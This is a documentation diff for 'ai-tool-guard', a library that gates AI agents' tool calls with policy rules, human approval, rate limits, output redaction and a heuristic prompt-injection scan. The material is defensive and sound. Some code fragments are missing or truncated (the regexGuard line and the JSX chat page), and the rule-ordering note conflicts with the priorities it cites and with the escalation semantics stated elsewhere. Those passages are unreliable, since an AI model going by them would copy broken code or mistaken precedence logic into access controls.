---------------------------------------------------------------- + deny({ + tools: ["createRecord", "updateRecord", "deleteRecord", "bulkOperation", "adminPanel"], + description: "Free plan users cannot perform write operations.", + condition: (ctx) => ctx.userAttributes["plan"] === "free", + priority: 100, + }), + + // ---------------------------------------------------------------- + // Pro plan: read + write, but no bulk operations or admin panel. + // ---------------------------------------------------------------- + deny({ + tools: ["bulkOperation", "adminPanel"], + description: "Bulk operations and admin panel require an enterprise plan.", + condition: (ctx) => ctx.userAttributes["plan"] === "pro", + priority: 90, + }), + + // ---------------------------------------------------------------- + // Role-based access: viewers cannot write regardless of plan. + // ---------------------------------------------------------------- + deny({ + tools: ["createRecord", "updateRecord", "deleteRecord", "bulkOperation"], + description: "Viewer role does not have write access.", + condition: (ctx) => ctx.userAttributes["role"] === "viewer", + priority: 85, + }), + + // ---------------------------------------------------------------- + // Admin-only tools: require both enterprise plan and admin role. + // ---------------------------------------------------------------- + deny({ + tools: "adminPanel", + description: "Admin panel requires enterprise plan and admin role.", + condition: (ctx) => + ctx.userAttributes["plan"] !== "enterprise" || + ctx.userAttributes["role"] !== "admin", + priority: 80, + }), + + // ---------------------------------------------------------------- + // Destructive operations: always require approval, even for admins. + // ---------------------------------------------------------------- + requireApproval({ + tools: "deleteRecord", + riskLevels: ["high"], + description: "Record deletion requires human confirmation.", + condition: (ctx) => + ctx.userAttributes["plan"] === "enterprise" && + ctx.userAttributes["role"] === "admin", + priority: 70, + }), + + // ---------------------------------------------------------------- + // Bulk operations: require approval from enterprise admins. + // ---------------------------------------------------------------- + requireApproval({ + tools: "bulkOperation", + description: "Bulk operations require operator approval.", + condition: (ctx) => + ctx.userAttributes["plan"] === "enterprise" && + ctx.userAttributes["role"] === "admin", + priority: 70, + }), + + // ---------------------------------------------------------------- + // Write access for editors (pro and enterprise). + // ---------------------------------------------------------------- + allow({ + tools: ["createRecord", "updateRecord"], + description: "Editors on pro and enterprise plans can write.", + condition: (ctx) => + ["pro", "enterprise"].includes(ctx.userAttributes["plan"] as string) && + ["editor", "admin"].includes(ctx.userAttributes["role"] as string), + priority: 50, + }), + + // ---------------------------------------------------------------- + // Universal read access. + // ---------------------------------------------------------------- + allow({ + tools: ["listRecords", "getRecord", "searchRecords"], + riskLevels: ["low"], + description: "All authenticated users may read records.", + priority: 10, + }), + ], + + defaultRiskLevel: "medium", + + // ------------------------------------------------------------------ + // Inject the full tenant context as user attributes. + // Policy rule conditions read from ctx.userAttributes. + // ------------------------------------------------------------------ + resolveUserAttributes: () => ({ + tenantId: tenant.tenantId, + userId: tenant.userId, + plan: tenant.plan, + role: tenant.role, + }), + + // ------------------------------------------------------------------ + // Rate limiting — keyed per tool; limits apply within this process. + // For distributed rate limiting, implement a custom RateLimiter + // backed by Redis and pass it as a PolicyBackend. + // ------------------------------------------------------------------ + defaultRateLimit: { + maxCalls: 100, + windowMs: 60_000, + strategy: "reject", + }, + + // ------------------------------------------------------------------ + // Approval handler — route to the tenant's configured approver. + // ------------------------------------------------------------------ + onApprovalRequired: async (token) => { + console.info( + `[approval] tenant=${tenant.tenantId} tool=${token.toolName} token=${token.id}` + ); + // Replace with tenant-specific approval workflow (Slack, email, etc.). + return { + approved: false, + reason: "Approval workflow not configured for this tenant.", + }; + }, + + // ------------------------------------------------------------------ + // Decision callback — write to the per-tenant audit partition. + // ------------------------------------------------------------------ + onDecision: (record) => { + tenantAuditLog(tenant.tenantId, record); + }, + }); +} +``` + +--- + +## Tool definitions + +```ts title="lib/tenant-tools.ts" +import { tool } from "ai"; +import { z } from "zod"; +import { zodGuard, secretsFilter, piiOutputFilter } from "ai-tool-guard"; +import { createTenantGuard } from "./tenant-guard"; +import { type TenantContext } from "./tenant"; + +// --------------------------------------------------------------------------- +// Raw tool definitions +// --------------------------------------------------------------------------- + +const listRecordsTool = tool({ + description: "List records in a collection with optional filters.", + parameters: z.object({ + collection: z.string(), + filter: z.string().optional(), + limit: z.number().int().min(1).max(100).default(20), + }), + execute: async ({ collection, filter, limit }) => ({ + collection, + records: [], // replace with real query + total: 0, + filter, + limit, + }), +}); + +const getRecordTool = tool({ + description: "Retrieve a single record by ID.", + parameters: z.object({ + collection: z.string(), + id: z.string(), + }), + execute: async ({ collection, id }) => ({ + collection, + id, + data: {}, // replace with real fetch + }), +}); + +const createRecordTool = tool({ + description: "Create a new record in a collection.", + parameters: z.object({ + collection: z.string(), + data: z.record(z.unknown()), + }), + execute: async ({ collection, data }) => ({ + id: crypto.randomUUID(), + collection, + data, + createdAt: new Date().toISOString(), + }), +}); + +const updateRecordTool = tool({ + description: "Update fields on an existing record.", + parameters: z.object({ + collection: z.string(), + id: z.string(), + patch: z.record(z.unknown()), + }), + execute: async ({ collection, id, patch }) => ({ + collection, + id, + patch, + updatedAt: new Date().toISOString(), + }), +}); + +const deleteRecordTool = tool({ + description: "Permanently delete a record.", + parameters: z.object({ + collection: z.string(), + id: z.string(), + }), + execute: async ({ collection, id }) => ({ + deleted: true, + collection, + id, + }), +}); + +const bulkOperationTool = tool({ + description: "Apply an operation to all records matching a filter.", + parameters: z.object({ + collection: z.string(), + operation: z.enum(["delete", "archive", "export"]), + filter: z.string(), + }), + execute: async ({ collection, operation, filter }) => ({ + collection, + operation, + filter, + affectedCount: 0, // replace with real query + }), +}); + +const adminPanelTool = tool({ + description: "Access tenant administration functions.", + parameters: z.object({ + action: z.enum(["list_users", "reset_quota", "view_billing"]), + }), + execute: async ({ action }) => ({ + action, + result: {}, // replace with real admin call + }), +}); + +// --------------------------------------------------------------------------- +// Guarded tools — assembled per-request with tenant context +// --------------------------------------------------------------------------- + +export function buildTenantTools(tenant: TenantContext) { + const guard = createTenantGuard(tenant); + + return guard.guardTools({ + listRecords: { + tool: listRecordsTool, + riskLevel: "low", + riskCategories: ["data-read"], + outputFilters: [piiOutputFilter()], + }, + getRecord: { + tool: getRecordTool, + riskLevel: "low", + riskCategories: ["data-read"], + outputFilters: [secretsFilter(), piiOutputFilter()], + }, + createRecord: { + tool: createRecordTool, + riskLevel: "medium", + riskCategories: ["data-write"], + argGuards: [ + zodGuard({ + field: "collection", + schema: z.string().regex(/^[a-z][a-z0-9_]{1,63}$/, "Invalid collection name."), + }), + ], + }, + updateRecord: { + tool: updateRecordTool, + riskLevel: "medium", + riskCategories: ["data-write"], + }, + deleteRecord: { + tool: deleteRecordTool, + riskLevel: "high", + riskCategories: ["data-delete"], + }, + bulkOperation: { + tool: bulkOperationTool, + riskLevel: "high", + riskCategories: ["data-delete", "data-write"], + }, + adminPanel: { + tool: adminPanelTool, + riskLevel: "high", + riskCategories: ["authentication"], + }, + }); +} +``` + +--- + +## Route handler + +```ts title="app/api/chat/route.ts" +import { streamText } from "ai"; +import { openai } from "@ai-sdk/openai"; +import { ToolGuardError } from "ai-tool-guard"; +import { resolveTenantContext } from "@/lib/tenant"; +import { buildTenantTools } from "@/lib/tenant-tools"; + +export async function POST(request: Request) { + // Resolve tenant from the authenticated request. + const tenant = resolveTenantContext(request); + + const { messages } = await request.json(); + + // Build a tool set scoped to this tenant's plan and role. + const tools = buildTenantTools(tenant); + + try { + const result = streamText({ + model: openai("gpt-4o"), + system: `You are an AI assistant for tenant "${tenant.tenantId}". ` + + `The current user has the "${tenant.role}" role on the "${tenant.plan}" plan. ` + + "Only attempt operations appropriate for their access level.", + messages, + tools, + maxSteps: 5, + }); + + return result.toDataStreamResponse(); + } catch (err) { + if (err instanceof ToolGuardError) { + return Response.json( + { + error: "tool_guard_error", + code: err.code, + tool: err.toolName, + message: err.message, + tenant: tenant.tenantId, + }, + { status: err.code === "rate-limited" ? 429 : 403 } + ); + } + + console.error(`[${tenant.tenantId}] Unexpected error:`, err); + return Response.json({ error: "internal_error" }, { status: 500 }); + } +} +``` + +--- + +## Policy matrix summary + +The table below shows the effective verdict for each tool, plan, and role combination after all rules are applied. Higher-priority rules take precedence. + +| Tool | free/viewer | pro/viewer | pro/editor | enterprise/viewer | enterprise/editor | enterprise/admin | +|---|---|---|---|---|---|---| +| `listRecords` | allow | allow | allow | allow | allow | allow | +| `getRecord` | allow | allow | allow | allow | allow | allow | +| `createRecord` | deny | deny | allow | deny | allow | allow | +| `updateRecord` | deny | deny | allow | deny | allow | allow | +| `deleteRecord` | deny | deny | deny | deny | deny | require-approval | +| `bulkOperation` | deny | deny | deny | deny | deny | require-approval | +| `adminPanel` | deny | deny | deny | deny | deny | allow | + +!!! info "Rule ordering matters" + Rules are evaluated from highest to lowest `priority`. The first matching rule wins. In this setup, the role check (priority 85) fires before the plan-level write check (priority 100 for free, 90 for pro), which means a free-plan admin still cannot write — the plan-level deny fires first. Adjust priorities if you need different precedence. + +!!! tip "Distributed rate limiting" + The built-in `RateLimiter` is in-process and does not share state between serverless worker instances. For per-tenant distributed rate limiting, implement a `PolicyBackend` that calls a Redis counter, and configure it via the `backend` option on `createToolGuard`. + +--- + +## Related + +- [Policy Engine](../guides/policy-engine.md) — condition predicates, `PolicyContext`, and escalation. +- [External Backends](../guides/external-backends.md) — delegating decisions to OPA or Cedar. +- [Rate Limiting](../guides/rate-limiting.md) — per-tool and global rate limits. +- [Decision Records](../guides/decision-records.md) — `DecisionRecord` structure for audit logging. diff --git a/docs/examples/nextjs-integration.md b/docs/examples/nextjs-integration.md new file mode 100644 index 0000000..49fcb55 --- /dev/null +++ b/docs/examples/nextjs-integration.md @@ -0,0 +1,405 @@ +# Next.js Integration + +This example walks through a complete Next.js App Router setup using `ai-tool-guard` with the Vercel AI SDK. The guard is created once as a module-level singleton, tools are defined with `tool()` from the `ai` package, and a human-in-the-loop approval flow is handled through a dedicated API endpoint. + +--- + +## Prerequisites + +```bash +npm install ai-tool-guard ai zod +npm install @opentelemetry/api # optional, for tracing +``` + +--- + +## Guard singleton + +Create the guard in a shared module so it is initialised once across all requests. The guard holds the rate limiter state and the approval manager, so it must not be recreated per-request. + +```ts title="lib/guard.ts" +import { + createToolGuard, + requireApproval, + deny, + allow, + ToolGuardError, + type ApprovalToken, + type ApprovalResolution, +} from "ai-tool-guard"; + +// --------------------------------------------------------------------------- +// Pending approvals store +// +// In production, replace this with Redis or a database so that +// the approval-resolution endpoint and the chat endpoint can +// run on separate serverless instances. +// --------------------------------------------------------------------------- +export const pendingApprovals = new Map< + string, + { resolve: (r: ApprovalResolution) => void; token: ApprovalToken } +>(); + +export const guard = createToolGuard({ + rules: [ + // Read operations — allow outright. + allow({ + tools: "lookupOrder", + description: "Order lookups are safe for autonomous execution.", + priority: 10, + }), + // Write operations — require human approval. + requireApproval({ + tools: ["updateAddress", "issueRefund"], + description: "State-mutating tools require operator sign-off.", + priority: 20, + }), + // Destructive operations — deny entirely. + deny({ + tools: "cancelOrder", + riskLevels: ["high", "critical"], + description: "Cancellations are not permitted through the AI assistant.", + priority: 30, + }), + ], + + defaultRiskLevel: "medium", + + // Called when a tool reaches require-approval verdict. + onApprovalRequired: async (token) => { + return new Promise((resolve) => { + // Store the resolver; the /api/approve route calls it. + pendingApprovals.set(token.id, { resolve, token }); + + // Expire unresolved tokens after the built-in TTL. + setTimeout(() => { + if (pendingApprovals.has(token.id)) { + pendingApprovals.delete(token.id); + resolve({ approved: false, reason: "Approval timed out." }); + } + }, token.ttlMs ?? 300_000); + }); + }, + + onDecision: (record) => { + console.log( + JSON.stringify({ + level: "info", + event: "tool_decision", + id: record.id, + tool: record.toolName, + verdict: record.verdict, + rules: record.matchedRules, + durationMs: record.evalDurationMs, + }) + ); + }, + + otel: { + enabled: true, + tracerName: "nextjs-ai-app", + defaultAttributes: { "deployment.environment": "production" }, + }, +}); +``` + +!!! note "Singleton lifetime in serverless" + Next.js module state is reused across warm invocations within a single worker process. On a serverless platform where workers are recycled frequently, replace `pendingApprovals` with a distributed store (e.g. Redis with `BLPOP`) so that the chat route and the approval route can run on different instances. + +--- + +## Tool definitions + +Define tools with the Vercel AI SDK `tool()` helper, then wrap them with `guard.guardTools()` to assign risk configuration and output filters. + +```ts title="lib/tools.ts" +import { tool } from "ai"; +import { z } from "zod"; +import { + zodGuard, + regexGuard, + secretsFilter, + piiOutputFilter, +} from "ai-tool-guard"; +import { guard } from "./guard"; + +// --------------------------------------------------------------------------- +// Raw AI SDK tool definitions +// --------------------------------------------------------------------------- + +const lookupOrderTool = tool({ + description: "Look up an order by ID and return its current status.", + parameters: z.object({ + orderId: z.string().min(1), + }), + execute: async ({ orderId }) => { + // Replace with real database call. + return { + orderId, + status: "shipped", + estimatedDelivery: "2026-02-20", + trackingNumber: "1Z999AA10123456784", + }; + }, +}); + +const updateAddressTool = tool({ + description: "Update the shipping address for an unshipped order.", + parameters: z.object({ + orderId: z.string().min(1), + newAddress: z.string().min(10), + }), + execute: async ({ orderId, newAddress }) => { + // Replace with real mutation. + return { success: true, orderId, updatedAddress: newAddress }; + }, +}); + +const issueRefundTool = tool({ + description: "Issue a full or partial refund for a completed order.", + parameters: z.object({ + orderId: z.string().min(1), + amount: z.number().positive(), + reason: z.enum(["damaged", "not_received", "wrong_item", "changed_mind"]), + }), + execute: async ({ orderId, amount, reason }) => { + return { success: true, orderId, refundedAmount: amount, reason }; + }, +}); + +// --------------------------------------------------------------------------- +// Guarded tools — pass to streamText({ tools }) +// --------------------------------------------------------------------------- + +export const guardedTools = guard.guardTools({ + lookupOrder: { + tool: lookupOrderTool, + riskLevel: "low", + riskCategories: ["data-read"], + // Scrub secrets and PII from order records before the model sees them. + outputFilters: [secretsFilter(), piiOutputFilter()], + }, + updateAddress: { + tool: updateAddressTool, + riskLevel: "medium", + riskCategories: ["data-write", "pii"], + argGuards: [ + zodGuard({ + field: "orderId", + schema: z.string().regex(/^ORD-\d{6,}$/, "Invalid order ID format."), + }), + // Reject addresses that look like they contain SQL or script injection. + regexGuard("newAddress", /; + reason?: string; + }; + + const pending = pendingApprovals.get(tokenId); + if (!pending) { + return Response.json( + { error: "Unknown or expired approval token." }, + { status: 404 } + ); + } + + // Resolve the promise that the guard is awaiting. + pending.resolve({ + approved, + approvedBy, + patchedArgs, + reason, + }); + + pendingApprovals.delete(tokenId); + + return Response.json({ ok: true, tokenId }); +} + +// List pending approvals for the admin UI. +export async function GET() { + const tokens = Array.from(pendingApprovals.values()).map((p) => p.token); + return Response.json({ pending: tokens }); +} +``` + +--- + +## Client — chat UI + +Use `useChat` from `ai/react`. When the API returns a `tool_guard_error`, display it inline rather than throwing. + +```tsx title="app/chat/page.tsx" +"use client"; + +import { useChat } from "ai/react"; + +export default function ChatPage() { + const { messages, input, handleInputChange, handleSubmit, error } = useChat({ + api: "/api/chat", + }); + + return ( +
+

Customer Support

+ +
    + {messages.map((m) => ( +
  • + {m.role === "user" ? "You" : "Assistant"}:{" "} + {m.content} +
  • + ))} +
+ + {error && ( +

+ {/* The error body is a JSON string from our route handler. */} + {(() => { + try { + const parsed = JSON.parse(error.message); + return `Blocked: ${parsed.message} (code: ${parsed.code})`; + } catch { + return error.message; + } + })()} +

+ )} + +
+ + +
+
+ ); +} +``` + +--- + +## How the approval flow works end-to-end + +1. The model calls `issueRefund` or `updateAddress`. +2. The guard evaluates the `require-approval` rule and invokes `onApprovalRequired`. +3. `onApprovalRequired` stores a `Promise` resolver in `pendingApprovals` and returns the promise. +4. The AI SDK route is blocked, awaiting the resolution. The HTTP connection remains open (set `runtime = "nodejs"` to avoid the default 10-second Edge timeout). +5. An admin sees the pending approval via `GET /api/approve` and posts a resolution to `POST /api/approve`. +6. The resolver fires, the guard receives the `ApprovalResolution`, and execution continues with the original (or patched) arguments. +7. The stream completes and the client receives the final response. + +!!! warning "Serverless timeout" + By default, Vercel serverless functions time out after 10 seconds on the Hobby plan and 60 seconds on Pro. For approval flows that may take minutes, use the `runtime = "nodejs"` export and configure a longer `maxDuration` in `next.config.ts`, or move the approval wait into a separate background job pattern. + +!!! tip "Patching arguments" + The approver can modify arguments before execution. For example, an operator reviewing an `issueRefund` call can lower the `amount` by returning `patchedArgs: { amount: 50 }` in the POST body. The guard merges the patched fields over the original arguments. + +--- + +## Related + +- [Approval Workflows](../guides/approval-workflows.md) — full lifecycle documentation. +- [Argument Validation](../guides/argument-validation.md) — all available arg guard factories. +- [Output Filtering](../guides/output-filtering.md) — `secretsFilter` and `piiOutputFilter` in depth. +- [Error Handling](../guides/error-handling.md) — `ToolGuardError` codes. diff --git a/docs/getting-started/concepts.md b/docs/getting-started/concepts.md new file mode 100644 index 0000000..df9d86f --- /dev/null +++ b/docs/getting-started/concepts.md @@ -0,0 +1,225 @@ +# Core Concepts + +Understand the key abstractions and mental model behind ai-tool-guard. + +--- + +## Risk Levels + +Every tool you register with ai-tool-guard is assigned a **risk level**. This single value drives default policy decisions and determines how cautiously the guard treats a tool call before you write any custom rules. + +| Level | Description | Default policy behavior | +|---|---|---| +| `low` | Read-only operations, safe queries | Allow automatically | +| `medium` | Write operations with bounded, reversible impact | Require approval | +| `high` | Destructive or sensitive operations | Deny by default | +| `critical` | Irreversible actions affecting infrastructure or security | Deny by default | + +**Examples by level:** + +- `low` — `getWeather`, `searchProducts`, `listFiles` +- `medium` — `updateProfile`, `sendEmail`, `createRecord` +- `high` — `deleteUser`, `processPayment`, `exportDatabase` +- `critical` — `dropDatabase`, `revokeAllTokens`, `purgeBackups` + +!!! tip + The `defaultPolicy()` helper generates a baseline rule set from these levels. You can layer custom rules on top to tighten or relax behavior for specific tools. + +!!! note + Risk level is not a security boundary on its own. It is an input to policy evaluation. Explicit `deny` rules always take precedence regardless of level. + +--- + +## Risk Categories + +Risk categories are **classification tags** applied to tools alongside the risk level. They do not affect policy matching directly, but they appear in every `DecisionRecord` and can be used to build audit queries, dashboards, and category-scoped external policies. + +| Category | Description | +|---|---| +| `data-read` | Reading records, querying databases, fetching content | +| `data-write` | Creating or updating persisted data | +| `data-delete` | Removing records, truncating datasets | +| `network` | Making outbound HTTP requests, webhooks, integrations | +| `filesystem` | Reading or writing files on disk | +| `authentication` | Token issuance, session management, credential changes | +| `payment` | Billing, charge, refund, and subscription operations | +| `pii` | Accessing or processing personally identifiable information | +| `custom` | Application-specific categories defined by the caller | + +A tool can carry multiple categories. For example, a `sendInvoiceEmail` tool might be tagged `["network", "payment", "pii"]`. + +!!! info + Categories are surfaced in decision records and passed to external approval backends, giving those systems the context needed to make informed decisions without needing to inspect tool arguments directly. + +--- + +## Decision Verdicts + +After evaluating all applicable rules, ai-tool-guard produces one of three **verdicts**: + +| Verdict | Meaning | +|---|---| +| `allow` | The tool call proceeds to execution immediately | +| `require-approval` | Execution pauses and the configured approval handler is invoked | +| `deny` | The tool call is blocked and a `ToolGuardError` is thrown | + +### Escalation semantics + +When multiple rules match a single tool call, the **most restrictive verdict wins**: + +``` +deny > require-approval > allow +``` + +A rule producing `deny` cannot be overridden by another rule producing `allow`. This prevents a permissive catch-all rule from inadvertently lowering the effective verdict on a sensitive operation. + +!!! tip + Design rules so that the most permissive case is the baseline and stricter rules layer on top. Relying on escalation to enforce security is safer than relying on rule ordering. + +--- + +## The Execution Pipeline + +Every tool call intercepted by ai-tool-guard passes through seven ordered stages. Each stage can halt execution before the tool runs. + +``` +Tool call invoked + | + v +┌───────────────────────┐ +│ 1. Injection detection │ Heuristic scan of arguments for prompt injection patterns +└───────────┬───────────┘ + | + v +┌───────────────────────┐ +│ 2. Argument validation │ Zod schemas, allowlists, denylists, regex, PII scanning +└───────────┬───────────┘ + | + v +┌───────────────────────┐ +│ 3. Policy evaluation │ Rules + external backend determine verdict +└───────────┬───────────┘ + | + v +┌───────────────────────┐ +│ 4. Approval flow │ If verdict is require-approval, invoke handler and wait +└───────────┬───────────┘ + | + v +┌───────────────────────┐ +│ 5. Rate limiting │ Sliding window count + concurrency check +└───────────┬───────────┘ + | + v +┌───────────────────────┐ +│ 6. Tool execution │ The actual tool function runs (or dry-run returns mock) +└───────────┬───────────┘ + | + v +┌───────────────────────┐ +│ 7. Output filtering │ Secrets stripping and PII redaction on the result +└───────────┬───────────┘ + | + v + Result returned +``` + +**Stage descriptions:** + +1. **Injection detection** — Before any other check, raw argument values are scanned for heuristic patterns associated with prompt injection (e.g., instruction overrides, role-switching phrases). A positive signal raises an immediate `deny` verdict. + +2. **Argument validation** — Structured argument guards run per-argument: Zod schema checks, allowlist/denylist membership, regex pattern matching, and PII field detection. Failures produce a `deny` verdict with a descriptive reason. + +3. **Policy evaluation** — The guard evaluates all matching rules (built-in defaults, custom rules, and responses from any configured external backend) and resolves a final verdict using escalation semantics. + +4. **Approval flow** — If the resolved verdict is `require-approval`, execution pauses and the `onApprovalRequired` callback is invoked. The callback receives an `ApprovalToken` with the full decision context and must return an `ApprovalResolution` object (`{ approved: boolean, patchedArgs?, approvedBy? }`) to continue or abort. + +5. **Rate limiting** — A sliding window counter checks whether the tool has exceeded its configured call rate. A concurrency check verifies that the tool is not already executing more instances than the configured maximum. Either failure produces a `deny` verdict. + +6. **Tool execution** — The wrapped tool function is called with the original arguments. If the guard is running in dry-run mode, execution is skipped and a configured mock response is returned instead. + +7. **Output filtering** — The tool result is scanned for sensitive values. Configured secret patterns and PII field names are redacted before the result is returned to the model. Redaction actions are recorded in the `DecisionRecord`. + +!!! note + Stages 1 through 5 run before the tool executes. A failure at any pre-execution stage means the tool never runs and no side effects occur. + +--- + +## Decision Records + +Every evaluation — successful or blocked — produces a **`DecisionRecord`**: a structured, immutable audit object that captures the full context of the decision. + +| Field | Type | Description | +|---|---|---| +| `id` | `string` | Unique identifier for this evaluation | +| `timestamp` | `Date` | When the evaluation occurred | +| `verdict` | `"allow" \| "deny" \| "require-approval"` | The resolved verdict | +| `toolName` | `string` | The name of the evaluated tool | +| `matchedRules` | `string[]` | IDs or names of all rules that matched | +| `riskLevel` | `RiskLevel` | The tool's configured risk level | +| `riskCategories` | `RiskCategory[]` | The tool's configured categories | +| `attributes` | `Record` | Arbitrary context attributes attached at call time | +| `reason` | `string` | Human-readable explanation of the verdict | +| `redactions` | `RedactionRecord[]` | Fields redacted in the output and why | +| `evalDurationMs` | `number` | Time taken to complete the evaluation in milliseconds | +| `dryRun` | `boolean` | Whether this evaluation ran in dry-run mode | + +Decision records are delivered to your code through the `onDecision` callback configured in `GuardOptions`. From there, you can persist them to a database, forward them to a logging pipeline, or emit them as structured log events. + +!!! tip + Because every evaluation produces a record — including allowed calls — you get a complete audit trail, not just a log of blocked events. This makes it possible to retrospectively analyze what the model was doing when an incident occurred. + +--- + +## Guard Options vs Tool Config + +ai-tool-guard uses two distinct configuration objects that operate at different scopes. + +### `GuardOptions` — global settings + +Passed once to `createToolGuard()`. Applies to every tool registered with the guard. + +| Field | Purpose | +|---|---| +| `rules` | Array of policy rules evaluated for all tools | +| `backend` | External approval or policy backend (HTTP, custom) | +| `injectionDetection` | Enable/disable and configure injection heuristics | +| `rateLimits` | Global default rate limit settings | +| `otel` | OpenTelemetry tracer and meter configuration | +| `onDecision` | Callback invoked after every evaluation with the `DecisionRecord` | +| `onApprovalRequired` | Callback invoked when a verdict is `require-approval` | +| `dryRun` | When `true`, no tool executes; mock responses are returned | + +### `ToolGuardConfig` — per-tool settings + +Passed per-tool via `guardTool()` or as values in the `guardTools()` map. Overrides or extends global settings for a specific tool. + +| Field | Purpose | +|---|---| +| `riskLevel` | The tool's risk level (`low`, `medium`, `high`, `critical`) | +| `riskCategories` | Classification tags for this tool | +| `argGuards` | Per-argument validation rules (Zod, allowlist, denylist, regex, PII) | +| `outputFilters` | Secret and PII redaction patterns applied to this tool's output | +| `rateLimit` | Per-tool call rate limit (overrides global default) | +| `maxConcurrency` | Maximum simultaneous executions of this tool | +| `requireApproval` | Force `require-approval` verdict for this tool regardless of rules | + +!!! info + Global settings in `GuardOptions` establish the baseline for all tools. Per-tool settings in `ToolGuardConfig` narrow or extend that baseline for specific tools. Where both define the same setting, the per-tool value takes precedence. + +```typescript +const guard = createToolGuard({ + // GuardOptions — applies to every tool + rules: defaultPolicy(), + onDecision: (record) => auditLog.write(record), +}); + +const safeTool = guard.guardTool("myTool", myTool, { + // ToolGuardConfig — applies only to myTool + riskLevel: "medium", + riskCategories: ["data-write", "network"], + argGuards: [ + piiGuard("email"), + ], +}); +``` diff --git a/docs/getting-started/installation.md b/docs/getting-started/installation.md new file mode 100644 index 0000000..74d63cd --- /dev/null +++ b/docs/getting-started/installation.md @@ -0,0 +1,127 @@ +# Installation + +This guide walks through installing `ai-tool-guard` and configuring your project for use with the library. + +## Prerequisites + +Before installing, ensure your environment meets the following requirements: + +- **Node.js 20 or later** — required for native ESM support and modern runtime features +- **TypeScript 5.7 or later** — required for accurate module resolution and type inference + +## Install the Package + +Install `ai-tool-guard` from npm: + +```bash +npm install ai-tool-guard +``` + +## Peer Dependencies + +`ai-tool-guard` has two required peer dependencies and one optional peer dependency. + +### Required + +| Package | Version | Purpose | +|---------|---------|---------| +| `ai` | `>=4.0.0` | Vercel AI SDK — provides the tool calling primitives that ai-tool-guard wraps | +| `zod` | `>=3.0.0` | Schema validation used by the built-in `zodGuard` and argument guards | + +Install both at once: + +```bash +npm install ai zod +``` + +### Optional + +| Package | Version | Purpose | +|---------|---------|---------| +| `@opentelemetry/api` | `>=1.0.0` | Enables structured tracing via the `ai-tool-guard/otel` subpath export | + +Install if you intend to use the OpenTelemetry integration: + +```bash +npm install @opentelemetry/api +``` + +!!! info "OpenTelemetry is opt-in" + The core library and all other subpath exports function without `@opentelemetry/api`. You only need it if you import from `ai-tool-guard/otel`. + +## TypeScript Configuration + +`ai-tool-guard` is published as an ES module (ESM). Your `tsconfig.json` must be configured for ESM resolution. The following settings are recommended: + +```json title="tsconfig.json" +{ + "compilerOptions": { + "target": "ES2022", + "module": "ESNext", + "moduleResolution": "bundler", + "esModuleInterop": true, + "verbatimModuleSyntax": true + } +} +``` + +!!! warning "CommonJS projects" + If your project uses CommonJS (`"module": "CommonJS"`), you will need to either migrate to ESM or use a bundler that can handle ESM packages. The library does not ship a CommonJS build. + +!!! tip "Using a bundler" + When targeting a bundler (Vite, webpack, esbuild, Rollup), `"moduleResolution": "bundler"` is the correct setting. For projects running directly under Node.js without a bundler, use `"moduleResolution": "NodeNext"` and ensure your `package.json` includes `"type": "module"`. + +## Verify the Installation + +After installing, confirm everything is wired up correctly by running a quick import check. Create a temporary file: + +```ts title="verify.ts" +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard(); +console.log("ai-tool-guard is ready!"); +``` + +Run it with `tsx` or your preferred TypeScript runner: + +```bash +npx tsx verify.ts +``` + +You should see: + +``` +ai-tool-guard is ready! +``` + +If you encounter a module resolution error, double-check that your `tsconfig.json` matches the settings above and that peer dependencies are installed. + +## Subpath Exports + +`ai-tool-guard` exposes a set of granular subpath exports so you can import only what you need, keeping bundle sizes lean. Each subpath is independently tree-shakeable. + +| Import path | Contents | +|-------------|----------| +| `ai-tool-guard` | Core API — `createToolGuard`, `ToolGuard`, `ToolGuardError` | +| `ai-tool-guard/policy` | Policy engine — `evaluatePolicy`, `allow`, `deny`, `requireApproval`, `simulate` | +| `ai-tool-guard/approval` | Approval flow — `ApprovalManager` | +| `ai-tool-guard/guards` | Built-in guards — `zodGuard`, `allowlist`, `denylist`, `secretsFilter`, `RateLimiter`, and more | +| `ai-tool-guard/otel` | OpenTelemetry integration — `createTracer`, `ATTR`, span helpers | +| `ai-tool-guard/mcp` | MCP drift detection — `detectDrift`, `FingerprintStore` | + +### Usage example + +Rather than importing everything from the root, prefer the specific subpath for the functionality you need: + +```ts +import { createToolGuard } from "ai-tool-guard"; +import { allow, deny, requireApproval } from "ai-tool-guard/policy"; +import { zodGuard, secretsFilter } from "ai-tool-guard/guards"; +``` + +!!! tip "Import from the root when in doubt" + The root `ai-tool-guard` export re-exports the most commonly used symbols. Start there and switch to subpath imports once you know which modules you rely on. + +## Next Steps + +With the library installed, move on to [Quick Start](quick-start.md) to create your first guarded tool. diff --git a/docs/getting-started/quick-start.md b/docs/getting-started/quick-start.md new file mode 100644 index 0000000..24d75ff --- /dev/null +++ b/docs/getting-started/quick-start.md @@ -0,0 +1,139 @@ +# Quick Start + +Get your first guarded tool running in 5 minutes. + +## Complete example + +The following example shows a minimal but complete integration of `ai-tool-guard` with the Vercel AI SDK. + +```ts +import { createToolGuard, defaultPolicy } from "ai-tool-guard"; +import { generateText, tool } from "ai"; +import { openai } from "@ai-sdk/openai"; +import { z } from "zod"; + +// 1. Define your tools as usual with the Vercel AI SDK. +const getWeather = tool({ + description: "Get the weather for a city", + parameters: z.object({ city: z.string() }), + execute: async ({ city }) => `Weather in ${city}: sunny, 72°F`, +}); + +const deleteUser = tool({ + description: "Delete a user account", + parameters: z.object({ userId: z.string() }), + execute: async ({ userId }) => `User ${userId} deleted`, +}); + +// 2. Create a guard with policy rules. +const guard = createToolGuard({ + rules: defaultPolicy(), + onApprovalRequired: async (token) => { + console.log(`Approval needed for ${token.toolName}:`, token.originalArgs); + return { approved: true, approvedBy: "admin" }; + }, + onDecision: (record) => { + console.log(`[${record.verdict}] ${record.toolName}: ${record.reason}`); + }, +}); + +// 3. Wrap tools with per-tool risk levels. +const tools = guard.guardTools({ + getWeather: { tool: getWeather, riskLevel: "low" }, + deleteUser: { tool: deleteUser, riskLevel: "high" }, +}); + +// 4. Use with AI SDK as normal. +const result = await generateText({ + model: openai("gpt-4o"), + tools, + prompt: "What's the weather in Tokyo?", +}); +``` + +## Step-by-step walkthrough + +### Step 1 — Define tools + +Define your tools exactly as you would without `ai-tool-guard`, using the Vercel AI SDK's `tool()` function. The guard wraps your tools non-destructively; your `execute` implementations remain unchanged. + +### Step 2 — Create a guard instance + +`createToolGuard()` accepts a configuration object with three main properties: + +**`rules`** + +A list of policy rules that determine what happens when a tool is called. `defaultPolicy()` provides a sensible baseline with the following behaviour: + +| Risk level | Default verdict | +|------------|-----------------| +| `low` | Allow immediately | +| `medium` | 